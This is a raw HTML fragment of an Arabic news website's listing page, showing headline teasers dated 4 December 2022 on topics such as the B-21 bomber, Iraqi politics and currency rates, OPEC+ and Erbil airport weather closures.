		<div class="post-522903 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="&#8220;B-21&#8221;  احدث قاذفة قنابل نووية تكشف عنها البنتاغون" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/014226056501758011.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;014226056501758011-210x136.jpeg&quot;,&quot;279&quot;:&quot;014226056501758011-279x220.jpeg&quot;,&quot;357&quot;:&quot;014226056501758011-357x210.jpeg&quot;,&quot;480&quot;:&quot;014226056501758011.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/b-21-%d8%a7%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d8%b0%d9%81%d8%a9-%d9%82%d9%86%d8%a7%d8%a8%d9%84-%d9%86%d9%88%d9%88%d9%8a%d8%a9-%d8%aa%d9%83%d8%b4%d9%81-%d8%b9%d9%86%d9%87%d8%a7-%d8%a7%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/b-21-%d8%a7%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d8%b0%d9%81%d8%a9-%d9%82%d9%86%d8%a7%d8%a8%d9%84-%d9%86%d9%88%d9%88%d9%8a%d8%a9-%d8%aa%d9%83%d8%b4%d9%81-%d8%b9%d9%86%d9%87%d8%a7-%d8%a7%d9%84/" class="post-title post-url">
			&#8220;B-21&#8221;  احدث قاذفة قنابل نووية تكشف عنها البنتاغون		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T12:31:39+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522897 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="الجوهر الأساسي للأنساق الثقافية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/الثقافة.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629-210x136.jpg&quot;,&quot;279&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629-279x220.jpg&quot;,&quot;357&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629-357x210.jpg&quot;,&quot;640&quot;:&quot;\u0627\u0644\u062b\u0642\u0627\u0641\u0629.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%ac%d9%88%d9%87%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%a7%d8%b3%d9%8a-%d9%84%d9%84%d8%a3%d9%86%d8%b3%d8%a7%d9%82-%d8%a7%d9%84%d8%ab%d9%82%d8%a7%d9%81%d9%8a%d8%a9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%ac%d9%88%d9%87%d8%b1-%d8%a7%d9%84%d8%a3%d8%b3%d8%a7%d8%b3%d9%8a-%d9%84%d9%84%d8%a3%d9%86%d8%b3%d8%a7%d9%82-%d8%a7%d9%84%d8%ab%d9%82%d8%a7%d9%81%d9%8a%d8%a9/" class="post-title post-url">
			الجوهر الأساسي للأنساق الثقافية		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T12:21:40+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522894 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/162247-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;162247-210x136.jpg&quot;,&quot;279&quot;:&quot;162247-279x220.jpg&quot;,&quot;357&quot;:&quot;162247-357x210.jpg&quot;,&quot;750&quot;:&quot;162247-750x430.jpg&quot;,&quot;780&quot;:&quot;162247.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d9%84%d8%b3%d9%88%d8%af%d8%a7%d9%86%d9%8a-%d9%8a%d8%b4%d9%83%d9%90%d9%91%d9%84-%d9%84%d8%ac%d9%86%d8%a9-%d9%84%d8%aa%d8%af%d9%82%d9%8a%d9%82-%d8%a3%d8%b1%d8%b2%d8%a7%d9%82-%d8%a3%d9%81%d8%b1/" class="post-title post-url">
			السوداني يشكِّل لجنة لتدقيق أرزاق أفراد القوات الأمنية وأعداد الحمايات للضباط		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T11:31:29+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522892 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="ارتفاع أسعار الدولار مقابل الدينار العراقي في بغداد .. اليوم الاحد" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2020/12/سعر-الدولار-574x430.png" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2020\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-210x136.png&quot;,&quot;279&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-279x220.png&quot;,&quot;357&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631-357x210.png&quot;,&quot;574&quot;:&quot;\u0633\u0639\u0631-\u0627\u0644\u062f\u0648\u0644\u0627\u0631.png&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a3%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d8%af%d9%88%d9%84%d8%a7%d8%b1-%d9%85%d9%82%d8%a7%d8%a8%d9%84-%d8%a7%d9%84%d8%af%d9%8a%d9%86%d8%a7%d8%b1-%d8%a7%d9%84/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a3%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d8%af%d9%88%d9%84%d8%a7%d8%b1-%d9%85%d9%82%d8%a7%d8%a8%d9%84-%d8%a7%d9%84%d8%af%d9%8a%d9%86%d8%a7%d8%b1-%d8%a7%d9%84/" class="post-title post-url">
			ارتفاع أسعار الدولار مقابل الدينار العراقي في بغداد .. اليوم الاحد		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:52:03+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522862 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="تعرف على اهم الطرق التي تمنع اعراض والتهاب المفاصل" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/6387609e42360455423b34b7-750x430.png" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;6387609e42360455423b34b7-210x136.png&quot;,&quot;279&quot;:&quot;6387609e42360455423b34b7-279x220.png&quot;,&quot;357&quot;:&quot;6387609e42360455423b34b7-357x210.png&quot;,&quot;750&quot;:&quot;6387609e42360455423b34b7-750x430.png&quot;,&quot;768&quot;:&quot;6387609e42360455423b34b7.png&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%aa%d8%b9%d8%b1%d9%81-%d8%b9%d9%84%d9%89-%d8%a7%d9%87%d9%85-%d8%a7%d9%84%d8%b7%d8%b1%d9%82-%d8%a7%d9%84%d8%aa%d9%8a-%d8%aa%d9%85%d9%86%d8%b9-%d8%a7%d8%b9%d8%b1%d8%a7%d8%b6-%d9%88%d8%a7%d9%84%d8%aa/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%aa%d8%b9%d8%b1%d9%81-%d8%b9%d9%84%d9%89-%d8%a7%d9%87%d9%85-%d8%a7%d9%84%d8%b7%d8%b1%d9%82-%d8%a7%d9%84%d8%aa%d9%8a-%d8%aa%d9%85%d9%86%d8%b9-%d8%a7%d8%b9%d8%b1%d8%a7%d8%b6-%d9%88%d8%a7%d9%84%d8%aa/" class="post-title post-url">
			تعرف على اهم الطرق التي تمنع اعراض والتهاب المفاصل		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:36:45+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522848 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/638c214e423604075264a29a-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;638c214e423604075264a29a-210x136.jpg&quot;,&quot;279&quot;:&quot;638c214e423604075264a29a-279x220.jpg&quot;,&quot;357&quot;:&quot;638c214e423604075264a29a-357x210.jpg&quot;,&quot;750&quot;:&quot;638c214e423604075264a29a-750x430.jpg&quot;,&quot;768&quot;:&quot;638c214e423604075264a29a.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/" class="post-title post-url">
			تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:35:01+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
</div></div></div></div><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12 vc_hidden-md vc_hidden-sm vc_hidden-xs"><div class="bs-vc-wrapper wpb_wrapper"><div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab pagination-animate">		<div class="bs-pagination-wrapper main-term-none infinity bs-slider-first-item">
			<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-522848 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/638c214e423604075264a29a-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;638c214e423604075264a29a-210x136.jpg&quot;,&quot;279&quot;:&quot;638c214e423604075264a29a-279x220.jpg&quot;,&quot;357&quot;:&quot;638c214e423604075264a29a-357x210.jpg&quot;,&quot;750&quot;:&quot;638c214e423604075264a29a-750x430.jpg&quot;,&quot;768&quot;:&quot;638c214e423604075264a29a.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%aa%d8%b1%d9%83%d9%8a%d8%a7-%d8%aa%d8%ad%d8%a7%d9%84%d9%81-%d8%ac%d8%af%d9%8a%d8%af-%d9%8a%d8%b6%d9%85-4-%d8%a3%d8%ad%d8%b2%d8%a7%d8%a8-%d8%b3%d9%8a%d8%a7%d8%b3%d9%8a%d8%a9-%d9%84%d8%af%d8%b9/" class="post-title post-url">
			تركيا : تحالف جديد يضم 4 أحزاب سياسية لدعم ترشيح اردوغان		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:35:01+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522875 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="تويتر : شركة آبل استأنفت نشر إعلاناتها بالكامل على المنصة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/638c2f654c59b749477ada37-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;638c2f654c59b749477ada37-210x136.jpg&quot;,&quot;279&quot;:&quot;638c2f654c59b749477ada37-279x220.jpg&quot;,&quot;357&quot;:&quot;638c2f654c59b749477ada37-357x210.jpg&quot;,&quot;750&quot;:&quot;638c2f654c59b749477ada37-750x430.jpg&quot;,&quot;768&quot;:&quot;638c2f654c59b749477ada37.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%aa%d9%88%d9%8a%d8%aa%d8%b1-%d8%b4%d8%b1%d9%83%d8%a9-%d8%a2%d8%a8%d9%84-%d8%a7%d8%b3%d8%aa%d8%a3%d9%86%d9%81%d8%aa-%d9%86%d8%b4%d8%b1-%d8%a5%d8%b9%d9%84%d8%a7%d9%86%d8%a7%d8%aa%d9%87%d8%a7-%d8%a8/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%aa%d9%88%d9%8a%d8%aa%d8%b1-%d8%b4%d8%b1%d9%83%d8%a9-%d8%a2%d8%a8%d9%84-%d8%a7%d8%b3%d8%aa%d8%a3%d9%86%d9%81%d8%aa-%d9%86%d8%b4%d8%b1-%d8%a5%d8%b9%d9%84%d8%a7%d9%86%d8%a7%d8%aa%d9%87%d8%a7-%d8%a8/" class="post-title post-url">
			تويتر : شركة آبل استأنفت نشر إعلاناتها بالكامل على المنصة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:31:32+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522872 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="تقرير : العراق يحتل المرتبة الثانية من بين مصدري النفط لأمريكا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/75-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;75-210x136.jpg&quot;,&quot;279&quot;:&quot;75-279x220.jpg&quot;,&quot;357&quot;:&quot;75-357x210.jpg&quot;,&quot;750&quot;:&quot;75-750x430.jpg&quot;,&quot;768&quot;:&quot;75.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%aa%d9%82%d8%b1%d9%8a%d8%b1-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82-%d9%8a%d8%ad%d8%aa%d9%84-%d8%a7%d9%84%d9%85%d8%b1%d8%aa%d8%a8%d8%a9-%d8%a7%d9%84%d8%ab%d8%a7%d9%86%d9%8a%d8%a9-%d9%85%d9%86-%d8%a8/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%aa%d9%82%d8%b1%d9%8a%d8%b1-%d8%a7%d9%84%d8%b9%d8%b1%d8%a7%d9%82-%d9%8a%d8%ad%d8%aa%d9%84-%d8%a7%d9%84%d9%85%d8%b1%d8%aa%d8%a8%d8%a9-%d8%a7%d9%84%d8%ab%d8%a7%d9%86%d9%8a%d8%a9-%d9%85%d9%86-%d8%a8/" class="post-title post-url">
			تقرير : العراق يحتل المرتبة الثانية من بين مصدري النفط لأمريكا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:30:22+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522865 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-26210 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-26210"><a href="https://mustaqila.com/%d8%a7%d8%ae%d8%a8%d8%a7%d8%b1-%d9%82%d8%b7%d8%b1/">اخبار قطر</a></span></div>				<a  title="بسبب الممارسات الإسرائيلية&#8230; حمد بن جاسم يحذر من اندلاع انتفاضة جديدة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/96-730x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;96-210x136.jpeg&quot;,&quot;279&quot;:&quot;96-279x220.jpeg&quot;,&quot;357&quot;:&quot;96-357x210.jpeg&quot;,&quot;730&quot;:&quot;96.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a8%d8%b3%d8%a8%d8%a8-%d8%a7%d9%84%d9%85%d9%85%d8%a7%d8%b1%d8%b3%d8%a7%d8%aa-%d8%a7%d9%84%d8%a5%d8%b3%d8%b1%d8%a7%d8%a6%d9%8a%d9%84%d9%8a%d8%a9-%d8%ad%d9%85%d8%af-%d8%a8%d9%86-%d8%ac%d8%a7%d8%b3/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a8%d8%b3%d8%a8%d8%a8-%d8%a7%d9%84%d9%85%d9%85%d8%a7%d8%b1%d8%b3%d8%a7%d8%aa-%d8%a7%d9%84%d8%a5%d8%b3%d8%b1%d8%a7%d8%a6%d9%8a%d9%84%d9%8a%d8%a9-%d8%ad%d9%85%d8%af-%d8%a8%d9%86-%d8%ac%d8%a7%d8%b3/" class="post-title post-url">
			بسبب الممارسات الإسرائيلية&#8230; حمد بن جاسم يحذر من اندلاع انتفاضة جديدة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:29:25+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522859 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="إيلون ماسك ينشر استطلاعا للرأي للعفو عن أسانج وسنودن" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/585-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;585-210x136.jpg&quot;,&quot;279&quot;:&quot;585-279x220.jpg&quot;,&quot;357&quot;:&quot;585-357x210.jpg&quot;,&quot;750&quot;:&quot;585-750x430.jpg&quot;,&quot;1140&quot;:&quot;585.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a5%d9%8a%d9%84%d9%88%d9%86-%d9%85%d8%a7%d8%b3%d9%83-%d9%8a%d9%86%d8%b4%d8%b1-%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9%d8%a7-%d9%84%d9%84%d8%b1%d8%a3%d9%8a-%d9%84%d9%84%d8%b9%d9%81%d9%88-%d8%b9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a5%d9%8a%d9%84%d9%88%d9%86-%d9%85%d8%a7%d8%b3%d9%83-%d9%8a%d9%86%d8%b4%d8%b1-%d8%a7%d8%b3%d8%aa%d8%b7%d9%84%d8%a7%d8%b9%d8%a7-%d9%84%d9%84%d8%b1%d8%a3%d9%8a-%d9%84%d9%84%d8%b9%d9%81%d9%88-%d8%b9/" class="post-title post-url">
			إيلون ماسك ينشر استطلاعا للرأي للعفو عن أسانج وسنودن		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:26:44+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522851 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="عبر الفيديو.. أوبك + تعقد اجتماعا لمناقشة خطط انتاج النفط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/0a295085-2018_12_3_14_23_23_326-740x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;0a295085-2018_12_3_14_23_23_326-210x136.jpg&quot;,&quot;279&quot;:&quot;0a295085-2018_12_3_14_23_23_326-279x220.jpg&quot;,&quot;357&quot;:&quot;0a295085-2018_12_3_14_23_23_326-357x210.jpg&quot;,&quot;740&quot;:&quot;0a295085-2018_12_3_14_23_23_326.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%b9%d8%a8%d8%b1-%d8%a7%d9%84%d9%81%d9%8a%d8%af%d9%8a%d9%88-%d8%a3%d9%88%d8%a8%d9%83-%d8%aa%d8%b9%d9%82%d8%af-%d8%a7%d8%ac%d8%aa%d9%85%d8%a7%d8%b9%d8%a7-%d9%84%d9%85%d9%86%d8%a7%d9%82%d8%b4/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%b9%d8%a8%d8%b1-%d8%a7%d9%84%d9%81%d9%8a%d8%af%d9%8a%d9%88-%d8%a3%d9%88%d8%a8%d9%83-%d8%aa%d8%b9%d9%82%d8%af-%d8%a7%d8%ac%d8%aa%d9%85%d8%a7%d8%b9%d8%a7-%d9%84%d9%85%d9%86%d8%a7%d9%82%d8%b4/" class="post-title post-url">
			عبر الفيديو.. أوبك + تعقد اجتماعا لمناقشة خطط انتاج النفط		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-12-04T10:21:26+03:00">ديسمبر 4, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-522878 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="مطار اربيل الدولي يعلن إيقاف الحركة الجوية بسبب الظروف الجوية" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/12/117073249_gettyimages-1231199869.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;117073249_gettyimages-1231199869-210x136.jpg&quot;,&quot;279&quot;:&quot;117073249_gettyimages-1231199869-279x220.jpg&quot;,&quot;357&quot;:&quot;117073249_gettyimages-1231199869-357x210.jpg&quot;,&quot;640&quot;:&quot;117073249_gettyimages-1231199869.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%b7%d8%a7%d8%b1-%d8%a7%d8%b1%d8%a8%d9%8a%d9%84-%d8%a7%d9%84%d8%af%d9%88%d9%84%d9%8a-%d9%8a%d8%b9%d9%84%d9%86-%d8%a5%d9%8a%d9%82%d8%a7%d9%81-%d8%a7%d9%84%d8%ad%d8%b1%d9%83%d8%a9-%d8%a7%d9%84/"></a>
							</div>
